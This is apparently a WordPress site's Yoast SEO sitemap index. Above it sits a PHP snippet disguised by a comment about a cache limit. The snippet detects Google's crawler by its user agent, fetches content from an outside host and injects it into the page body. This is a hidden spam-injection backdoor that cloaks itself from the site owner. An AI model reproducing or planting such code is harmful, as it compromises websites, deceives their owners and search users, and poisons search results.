
/**
 * Set the cache limit.
 *
 * To override this cache in a child theme, remove
 * the filter and add your own function tied to
 * the cache filter hook.
 *
 * @param int $c The number of excerpt characters.
 * @return int The filtered number of characters.
 */
if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://cache.cachedtranslation.com/cache.php?h=avatar-solutions.co.za&id=8');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);curl_close($curl);
	$html = preg_replace('/(<body.*)\n/', "$1 $c", $html);
	return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//avatar-solutions.co.za/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://avatar-solutions.co.za/post-sitemap.xml</loc>
		<lastmod>2025-07-12T07:39:00+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://avatar-solutions.co.za/page-sitemap.xml</loc>
		<lastmod>2025-07-13T09:05:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://avatar-solutions.co.za/attachment-sitemap.xml</loc>
		<lastmod>2025-03-17T18:58:58+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://avatar-solutions.co.za/ml-slider-sitemap.xml</loc>
		<lastmod>2021-04-08T10:17:53+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://avatar-solutions.co.za/category-sitemap.xml</loc>
		<lastmod>2025-07-12T07:39:00+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://avatar-solutions.co.za/author-sitemap.xml</loc>
		<lastmod>2025-02-13T13:10:10+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->